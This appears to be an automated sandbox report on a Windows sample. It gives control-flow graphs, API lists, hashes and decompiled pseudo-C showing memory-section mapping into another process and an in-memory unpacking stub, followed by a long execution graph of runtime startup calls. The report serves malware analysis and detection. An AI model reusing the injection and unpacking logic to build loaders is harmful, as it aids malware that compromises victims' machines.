                                                            control_flow_graph 270 4017e4 271 4017e6 270->271 272 4017ec-401835 270->272 271->272 273 4017e8-4017eb 271->273 298 401838-401873 272->298 273->272 277 401770-401786 NtCreateSection 273->277 280 401998-4019ef call 4012a4 277->280 281 40178c-401790 277->281 281->280 284 401796-4017b7 NtMapViewOfSection 281->284 284->280 287 4017bd-4017d9 NtMapViewOfSection 284->287 287->280 290 4017df 287->290 290->280 293 4017df call 4017e4 290->293 293->280 315 401875-40189e 298->315 320 4018a0-4018a6 315->320 321 4018a8 315->321 322 4018ae-4018b4 320->322 321->322 324 4018c4-4018c8 322->324 325 4018b6-4018c2 322->325 324->322 326 4018ca-4018cf 324->326 325->324 327 4018d1 call 4018d6 326->327 328 401937-401946 326->328 330 401949-40194c 328->330 331 401976-40198f 330->331 332 40194e-401958 330->332 331->280 333 40195b-401964 332->333 334 401972 333->334 335 401966-401970 333->335 334->333 336 401974 334->336 335->334 336->330
                                                            APIs
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: SectionView
                                                            • String ID:
                                                            • API String ID: 1323581903-0
                                                            • Opcode ID: fc4b47963422dcefc7eb3c8f01a7b8c00c64b8d35549142067844c51b0883b8d
                                                            • Instruction ID: 821b0d10a87f8ebea7d35f23d7e2e973144a2f41bdb8f2b8da3a1113d8856595
                                                            • Opcode Fuzzy Hash: fc4b47963422dcefc7eb3c8f01a7b8c00c64b8d35549142067844c51b0883b8d
                                                            • Instruction Fuzzy Hash: 7F510773904144EBEB25AA55C844FAB77B5EF91300F28813BE842772F0D63C5A42D75B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 53003c-530047 1 530049 0->1 2 53004c-530263 call 530a3f call 530e0f call 530d90 VirtualAlloc 0->2 1->2 17 530265-530289 call 530a69 2->17 18 53028b-530292 2->18 23 5302ce-5303c2 VirtualProtect call 530cce call 530ce7 17->23 20 5302a1-5302b0 18->20 22 5302b2-5302cc 20->22 20->23 22->20 29 5303d1-5303e0 23->29 30 5303e2-530437 call 530ce7 29->30 31 530439-5304b8 VirtualFree 29->31 30->29 32 5305f4-5305fe 31->32 33 5304be-5304cd 31->33 37 530604-53060d 32->37 38 53077f-530789 32->38 36 5304d3-5304dd 33->36 36->32 40 5304e3-530505 36->40 37->38 43 530613-530637 37->43 41 5307a6-5307b0 38->41 42 53078b-5307a3 38->42 51 530517-530520 40->51 52 530507-530515 40->52 44 5307b6-5307cb 41->44 45 53086e-5308be LoadLibraryA 41->45 42->41 46 53063e-530648 43->46 48 5307d2-5307d5 44->48 50 5308c7-5308f9 45->50 46->38 49 53064e-53065a 46->49 53 5307d7-5307e0 48->53 54 530824-530833 48->54 49->38 55 530660-53066a 49->55 56 530902-53091d 50->56 57 5308fb-530901 50->57 58 530526-530547 51->58 52->58 59 5307e2 53->59 60 5307e4-530822 53->60 62 530839-53083c 54->62 61 53067a-530689 55->61 57->56 63 53054d-530550 58->63 59->54 60->48 64 530750-53077a 61->64 65 53068f-5306b2 61->65 62->45 66 53083e-530847 62->66 68 5305e0-5305ef 63->68 69 530556-53056b 63->69 64->46 70 5306b4-5306ed 65->70 71 5306ef-5306fc 65->71 72 53084b-53086c 66->72 73 530849 66->73 68->36 76 53056f-53057a 69->76 77 53056d 69->77 70->71 74 53074b 71->74 75 5306fe-530748 71->75 72->62 73->45 74->61 75->74 80 53059b-5305bb 76->80 81 53057c-530599 76->81 77->68 84 5305bd-5305db 80->84 81->84 84->63
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0053024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_530000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: dbbae28743631155f3db6bb32cb2d02d0cd49f0ed6f47c960f984cfc88bdb838
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 7C526874A01229DFDB64CF58C995BA8BBB1BF09304F1480D9E90DAB391DB30AE95DF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 337 530e0f-530e24 SetErrorMode * 2 338 530e26 337->338 339 530e2b-530e2c 337->339 338->339
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,00530223,?,?), ref: 00530E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,00530223,?,?), ref: 00530E1E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_530000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 744b544679e81edac46ace1a1040a10e47f9b2819e4d35e23ba8ce53e105023a
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: BDD0123124522877D7003A94DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 340 4019f2-401a5c call 4012a4 Sleep call 401521 354 401a6b-401aaf call 4012a4 340->354 355 401a5e-401a66 call 401615 340->355 355->354
                                                            C-Code - Quality: 37%
                                                            			E004019F2(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                            				char _v8;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t8;
                                                            				char* _t9;
                                                            				void* _t13;
                                                            				intOrPtr* _t14;
                                                            				intOrPtr _t15;
                                                            				intOrPtr _t17;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            				intOrPtr* _t21;
                                                            				intOrPtr* _t22;
                                                            				void* _t24;
                                                            
                                                            				_t8 = 0x1a3f;
                                                            				_push(0x6c);
                                                            				_t15 =  *_t21;
                                                            				_t22 = _t21 + 4;
                                                            				_push(0xad);
                                                            				_t17 =  *_t22;
                                                            				L004012A4(_t8, _t13, _t15, _t17, _t19, _t20, _t24);
                                                            				_t14 = _a4;
                                                            				Sleep(0x1388);
                                                            				_t9 =  &_v8;
                                                            				_push(_t9);
                                                            				_push(_a12);
                                                            				_push(_a8);
                                                            				_push(_t14); // executed
                                                            				E00401521(); // executed
                                                            				_t25 = _t9;
                                                            				if(_t9 != 0) {
                                                            					E00401615(_t14, _t9, _v8, _a16); // executed
                                                            				}
                                                            				 *_t14(0xffffffff, 0);
                                                            				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t19, _t20, _t25);
                                                            				return 0x1a3f;
                                                            			}


















                                                            0x00401a07
                                                            0x00401a14
                                                            0x00401a16
                                                            0x00401a19
                                                            0x00401a28
                                                            0x00401a2d
                                                            0x00401a3a
                                                            0x00401a3f
                                                            0x00401a47
                                                            0x00401a4a
                                                            0x00401a4d
                                                            0x00401a4e
                                                            0x00401a51
                                                            0x00401a54
                                                            0x00401a55
                                                            0x00401a5a
                                                            0x00401a5c
                                                            0x00401a66
                                                            0x00401a66
                                                            0x00401a6f
                                                            0x00401aa6
                                                            0x00401aaf

                                                            APIs
                                                            • Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 7ad253cd71c6769f5a407361799426ff06398afbb16f5778e98e9b3cec4ba55c
                                                            • Instruction ID: 25844bbcf1cbe2862b2fc1e39125094b9f234e696ff082aa1ccfa1e087edcb68
                                                            • Opcode Fuzzy Hash: 7ad253cd71c6769f5a407361799426ff06398afbb16f5778e98e9b3cec4ba55c
                                                            • Instruction Fuzzy Hash: 7301AD3170A205EBEB00AA948D41EBB32299F85314F3404B7BA53B91F1D67D89136F6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 369 401a0a-401a5c call 4012a4 Sleep call 401521 383 401a6b-401aaf call 4012a4 369->383 384 401a5e-401a66 call 401615 369->384 384->383
                                                            C-Code - Quality: 33%
                                                            			E00401A0A() {
                                                            				void* _t8;
                                                            				void* _t9;
                                                            				void* _t13;
                                                            				intOrPtr* _t14;
                                                            				intOrPtr _t16;
                                                            				intOrPtr _t18;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            				void* _t24;
                                                            				intOrPtr* _t26;
                                                            				intOrPtr* _t27;
                                                            				void* _t30;
                                                            
                                                            				asm("adc al, ah");
                                                            				_t8 = 0x1a3f;
                                                            				_push(0x6c);
                                                            				_t16 =  *_t26;
                                                            				_t27 = _t26 + 4;
                                                            				_push(0xad);
                                                            				_t18 =  *_t27;
                                                            				L004012A4(_t8, _t13, _t16, _t18, _t20, _t22, _t30);
                                                            				_t14 =  *((intOrPtr*)(_t24 + 8));
                                                            				Sleep(0x1388);
                                                            				_t9 = _t24 - 4;
                                                            				_push(_t9);
                                                            				_push( *((intOrPtr*)(_t24 + 0x10)));
                                                            				_push( *((intOrPtr*)(_t24 + 0xc)));
                                                            				_push(_t14); // executed
                                                            				E00401521(); // executed
                                                            				_t31 = _t9;
                                                            				if(_t9 != 0) {
                                                            					E00401615(_t14, _t9,  *((intOrPtr*)(_t24 - 4)),  *((intOrPtr*)(_t24 + 0x14))); // executed
                                                            				}
                                                            				 *_t14(0xffffffff, 0);
                                                            				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t20, _t22, _t31);
                                                            				return 0x1a3f;
                                                            			}















                                                            0x00401a0a
                                                            0x00401a07
                                                            0x00401a14
                                                            0x00401a16
                                                            0x00401a19
                                                            0x00401a28
                                                            0x00401a2d
                                                            0x00401a3a
                                                            0x00401a3f
                                                            0x00401a47
                                                            0x00401a4a
                                                            0x00401a4d
                                                            0x00401a4e
                                                            0x00401a51
                                                            0x00401a54
                                                            0x00401a55
                                                            0x00401a5a
                                                            0x00401a5c
                                                            0x00401a66
                                                            0x00401a66
                                                            0x00401a6f
                                                            0x00401aa6
                                                            0x00401aaf

                                                            APIs
                                                            • Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 2acbda75c9dd3b6b70a326b48304a4ddcdc6a07758558ebcc5b2723483e045e0
                                                            • Instruction ID: d8c634ebd0fb47f8dbfc2dcf49b775dfd32c4584f4b3c73897dcc7655f38e994
                                                            • Opcode Fuzzy Hash: 2acbda75c9dd3b6b70a326b48304a4ddcdc6a07758558ebcc5b2723483e045e0
                                                            • Instruction Fuzzy Hash: A6014C3270A205EBDB009A948D41BBA32159F85314F3444B7BA53B91F1D67E89136F2F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 398 401a01-401a5c call 4012a4 Sleep call 401521 411 401a6b-401aaf call 4012a4 398->411 412 401a5e-401a66 call 401615 398->412 412->411
                                                            C-Code - Quality: 38%
                                                            			E00401A01(void* __ecx) {
                                                            				void* _t8;
                                                            				void* _t9;
                                                            				void* _t13;
                                                            				intOrPtr* _t14;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t20;
                                                            				void* _t22;
                                                            				void* _t24;
                                                            				void* _t26;
                                                            				intOrPtr* _t28;
                                                            				intOrPtr* _t29;
                                                            				void* _t32;
                                                            
                                                            				_t32 = __ecx - 1;
                                                            				_t8 = 0x1a3f;
                                                            				_push(0x6c);
                                                            				_t18 =  *_t28;
                                                            				_t29 = _t28 + 4;
                                                            				_push(0xad);
                                                            				_t20 =  *_t29;
                                                            				L004012A4(_t8, _t13, _t18, _t20, _t22, _t24, _t32);
                                                            				_t14 =  *((intOrPtr*)(_t26 + 8));
                                                            				Sleep(0x1388);
                                                            				_t9 = _t26 - 4;
                                                            				_push(_t9);
                                                            				_push( *((intOrPtr*)(_t26 + 0x10)));
                                                            				_push( *((intOrPtr*)(_t26 + 0xc)));
                                                            				_push(_t14); // executed
                                                            				E00401521(); // executed
                                                            				_t33 = _t9;
                                                            				if(_t9 != 0) {
                                                            					E00401615(_t14, _t9,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
                                                            				}
                                                            				 *_t14(0xffffffff, 0);
                                                            				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t22, _t24, _t33);
                                                            				return 0x1a3f;
                                                            			}















                                                            0x00401a01
                                                            0x00401a07
                                                            0x00401a14
                                                            0x00401a16
                                                            0x00401a19
                                                            0x00401a28
                                                            0x00401a2d
                                                            0x00401a3a
                                                            0x00401a3f
                                                            0x00401a47
                                                            0x00401a4a
                                                            0x00401a4d
                                                            0x00401a4e
                                                            0x00401a51
                                                            0x00401a54
                                                            0x00401a55
                                                            0x00401a5a
                                                            0x00401a5c
                                                            0x00401a66
                                                            0x00401a66
                                                            0x00401a6f
                                                            0x00401aa6
                                                            0x00401aaf

                                                            APIs
                                                            • Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 949b325ddbe82bc9e2a83b7552eeaae9020fa5dd3578ed03a8661c1f145a6485
                                                            • Instruction ID: bb8f854860517b91ef23627f573853fa0fc08e5855f63139474b369349933f98
                                                            • Opcode Fuzzy Hash: 949b325ddbe82bc9e2a83b7552eeaae9020fa5dd3578ed03a8661c1f145a6485
                                                            • Instruction Fuzzy Hash: D9015E3170A201EBEB009AD48D41BBA32159F85314F3444B7BA53B91F1D67E89136F2F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 426 401a0e-401a5c call 4012a4 Sleep call 401521 436 401a6b-401aaf call 4012a4 426->436 437 401a5e-401a66 call 401615 426->437 437->436
                                                            C-Code - Quality: 31%
                                                            			E00401A0E() {
                                                            				void* _t8;
                                                            				void* _t9;
                                                            				void* _t13;
                                                            				intOrPtr* _t14;
                                                            				intOrPtr _t16;
                                                            				intOrPtr _t18;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            				void* _t24;
                                                            				intOrPtr* _t26;
                                                            				intOrPtr* _t27;
                                                            				void* _t30;
                                                            
                                                            				asm("adc ch, bl");
                                                            				_push(0x6c);
                                                            				_t16 =  *_t26;
                                                            				_t27 = _t26 + 4;
                                                            				_push(0xad);
                                                            				_t18 =  *_t27;
                                                            				L004012A4(_t8, _t13, _t16, _t18, _t20, _t22, _t30);
                                                            				_t14 =  *((intOrPtr*)(_t24 + 8));
                                                            				Sleep(0x1388);
                                                            				_t9 = _t24 - 4;
                                                            				_push(_t9);
                                                            				_push( *((intOrPtr*)(_t24 + 0x10)));
                                                            				_push( *((intOrPtr*)(_t24 + 0xc)));
                                                            				_push(_t14); // executed
                                                            				E00401521(); // executed
                                                            				_t31 = _t9;
                                                            				if(_t9 != 0) {
                                                            					E00401615(_t14, _t9,  *((intOrPtr*)(_t24 - 4)),  *((intOrPtr*)(_t24 + 0x14))); // executed
                                                            				}
                                                            				 *_t14(0xffffffff, 0);
                                                            				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t20, _t22, _t31);
                                                            				return 0x1a3f;
                                                            			}















                                                            0x00401a0e
                                                            0x00401a14
                                                            0x00401a16
                                                            0x00401a19
                                                            0x00401a28
                                                            0x00401a2d
                                                            0x00401a3a
                                                            0x00401a3f
                                                            0x00401a47
                                                            0x00401a4a
                                                            0x00401a4d
                                                            0x00401a4e
                                                            0x00401a51
                                                            0x00401a54
                                                            0x00401a55
                                                            0x00401a5a
                                                            0x00401a5c
                                                            0x00401a66
                                                            0x00401a66
                                                            0x00401a6f
                                                            0x00401aa6
                                                            0x00401aaf

                                                            APIs
                                                            • Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 3610154dd3eda8e1f1c0e96eb824f9203b9b722972d870a07033dd98430c117a
                                                            • Instruction ID: 2e2055f9db7f7bfa196961a35f33946421e8fe2f98abc4ca2717ed5341f40e74
                                                            • Opcode Fuzzy Hash: 3610154dd3eda8e1f1c0e96eb824f9203b9b722972d870a07033dd98430c117a
                                                            • Instruction Fuzzy Hash: C401713170A201EBDB00AAD4CD41BBA32259F86314F2444B7BA53B91F1D67D8913AF2F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_530000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$GetProcAddress.$l
                                                            • API String ID: 0-2784972518
                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction ID: 626030a6da64d2018668b7208c1654a7c64507d178d3c49bd2a1f5fcbc63f1d7
                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction Fuzzy Hash: F93148B6900709DFDB10CF99C884BAEBBF9FF48324F24504AD841AB251D771EA45CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: b
                                                            • API String ID: 0-1908338681
                                                            • Opcode ID: 64457ab28ea3954589b05a89a8d5ed502d78dd7f7db54dbae28d98d3ce636e54
                                                            • Instruction ID: 564904199c633e7befa50f4361763fa90495e5dae6f3c10ef61c3106c0b74965
                                                            • Opcode Fuzzy Hash: 64457ab28ea3954589b05a89a8d5ed502d78dd7f7db54dbae28d98d3ce636e54
                                                            • Instruction Fuzzy Hash: 8331465194E3C11FD7138B7148585A5BFB48E03215B8C42EBC4E2DF2E3D66D490BC346
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_530000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction ID: f877ad247cfaf65b2c6095dc76c1e9d33ce4103f6f202f1b3f17c78d83ed0016
                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction Fuzzy Hash: 0001A276B007048FDF21DF64C814BAB37E9FB86316F4548A5D90A972C2E774A9418B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: df4ca70348a80a1c5e243a19940bfcb3f583047a3fd2664121538fb861fa3c13
                                                            • Instruction ID: 94e1fd373f19b4e3f94f7ef0f3e31781e10bf96d0b34e49fc91fe9c03923878a
                                                            • Opcode Fuzzy Hash: df4ca70348a80a1c5e243a19940bfcb3f583047a3fd2664121538fb861fa3c13
                                                            • Instruction Fuzzy Hash: 89D0A72A5643024FC231DE344EC64D8BF21EA89624B5D1A58C5512BB66A918B5478561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447770029.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_409000_file.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                            • Instruction ID: 7aaf76d984b8bee9c108c0065b9737c736a60a61fa3666d8c25626394b4aeabb
                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                            • Instruction Fuzzy Hash: D511833244014EBBCF125F85DC41CEE3F62BF59394F588426FA1869172C63BC972AB85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:3.1%
                                                            Dynamic/Decrypted Code Coverage:15.1%
                                                            Signature Coverage:3.5%
                                                            Total number of Nodes:1609
                                                            Total number of Limit Nodes:23
                                                            execution_graph 7250 4040c0 7251 4040db 7250->7251 7254 40418a 7251->7254 7255 4040ec 7254->7255 7256 404193 7254->7256 7256->7255 7258 4074c6 7256->7258 7259 407503 __handle_exc 7258->7259 7260 407526 __87except __ctrlfp 7259->7260 7266 40ad84 7259->7266 7263 4075f1 7260->7263 7269 40af89 7260->7269 7264 405ec0 setSBUpLow 5 API calls 7263->7264 7265 4075fe 7264->7265 7265->7255 7276 40aaa8 7266->7276 7268 40ada2 7268->7260 7270 40af94 7269->7270 7271 40afa9 7269->7271 7273 40afae 7270->7273 7274 404382 __close 68 API calls 7270->7274 7272 404382 __close 68 API calls 7271->7272 7272->7273 7273->7263 7275 40afa1 7274->7275 7275->7263 7277 40aacf __raise_exc_ex 7276->7277 7278 40acc2 RaiseException 7277->7278 7279 40acdb 7278->7279 7279->7268 7280 40cac0 RtlUnwind 6034 403e81 6080 40487c 6034->6080 6036 403e8d GetStartupInfoW 6038 403eb0 6036->6038 6081 407400 HeapCreate 6038->6081 6040 403f00 6142 406539 GetModuleHandleW 6040->6142 6043 403f06 6044 403f0a 6043->6044 6045 403f12 __RTC_Initialize 6043->6045 6046 403e58 _fast_error_exit 68 API calls 6044->6046 6083 4071ac 6045->6083 6047 403f11 6046->6047 6047->6045 6049 403f1f 6050 403f23 6049->6050 6051 403f2b GetCommandLineW 6049->6051 6175 403b50 6050->6175 6098 40714f GetEnvironmentStringsW 6051->6098 6055 403f3a 6182 4070a1 GetModuleFileNameW 6055->6182 6057 403f44 6058 403f50 6057->6058 6059 403f48 6057->6059 6104 406e72 6058->6104 6061 403b50 __amsg_exit 68 API calls 6059->6061 6063 403f4f 6061->6063 6063->6058 6064 403f61 6117 403c0f 6064->6117 6065 403f59 6066 403b50 __amsg_exit 68 API calls 6065->6066 6068 403f60 6066->6068 6068->6064 6069 403f67 6070 403f6c 6069->6070 6073 403f73 __wwincmdln 6069->6073 6071 403b50 __amsg_exit 68 API calls 6070->6071 6072 403f72 6071->6072 6072->6073 6073->6072 6123 402adc 6073->6123 6076 403fa1 6189 403dec 6076->6189 6079 403fa6 __close 6080->6036 6082 403ef4 6081->6082 6082->6040 6134 403e58 6082->6134 6192 40487c 6083->6192 6085 4071b8 GetStartupInfoA 6193 40810e 6085->6193 6087 4071d9 6088 4073f7 __close 6087->6088 6090 40810e __calloc_crt 68 API calls 6087->6090 6093 4072c1 6087->6093 6097 40733e 6087->6097 6088->6049 6089 407374 GetStdHandle 6089->6097 6090->6087 6091 4073d9 SetHandleCount 6091->6088 6092 407386 GetFileType 6092->6097 6093->6088 6094 4072ea GetFileType 6093->6094 6093->6097 6199 406d45 6093->6199 6094->6093 6095 406d45 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6095->6097 6097->6088 6097->6089 6097->6091 6097->6092 6097->6095 6099 407160 6098->6099 6100 407164 6098->6100 6099->6055 6101 4080c9 __malloc_crt 68 API calls 6100->6101 6102 407185 _realloc 6101->6102 6103 40718c FreeEnvironmentStringsW 6102->6103 6103->6055 6105 406e8a _wcslen 6104->6105 6109 403f55 6104->6109 6106 40810e __calloc_crt 68 API calls 6105->6106 6112 406eae _wcslen 6106->6112 6107 406f13 6108 4081a8 __mtinitlocknum 68 API calls 6107->6108 6108->6109 6109->6064 6109->6065 6110 40810e __calloc_crt 68 API calls 6110->6112 6111 406f39 6113 4081a8 __mtinitlocknum 68 API calls 6111->6113 6112->6107 6112->6109 6112->6110 6112->6111 6115 406ef8 6112->6115 6562 40aa1f 6112->6562 6113->6109 6115->6112 6116 40472e __invoke_watson 10 API calls 6115->6116 6116->6115 6118 403c1d __IsNonwritableInCurrentImage 6117->6118 6571 4069ff 6118->6571 6120 403c3b __initterm_e 6122 403c5a __IsNonwritableInCurrentImage __initterm 6120->6122 6575 40699c 6120->6575 6122->6069 6124 402aef 6 API calls 6123->6124 6129 402b39 6123->6129 6675 403954 6124->6675 6125 402b3b SetCommMask SetLastError GetConsoleAliasW 6125->6129 6128 403908 6682 40297f 6128->6682 6129->6125 6129->6128 6130 403954 _calloc 68 API calls 6132 402b29 6130->6132 6132->6129 6133 403921 6133->6076 6186 403dc0 6133->6186 6135 403e66 6134->6135 6136 403e6b 6134->6136 6137 405e87 __FF_MSGBANNER 68 API calls 6135->6137 6138 405cdc __NMSG_WRITE 68 API calls 6136->6138 6137->6136 6139 403e73 6138->6139 6140 403ba4 __mtinitlocknum 3 API calls 6139->6140 6141 403e7d 6140->6141 6141->6040 6143 406553 6142->6143 6144 40654d 6142->6144 6146 4066bc 6143->6146 6147 40655e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6143->6147 6145 403b20 __crt_waiting_on_module_handle 2 API calls 6144->6145 6145->6143 7033 406253 6146->7033 6152 4065a7 TlsAlloc 6147->6152 6150 4065f5 TlsSetValue 6151 4066c1 6150->6151 6153 406606 6150->6153 6151->6043 6152->6150 6152->6151 7022 403e0a 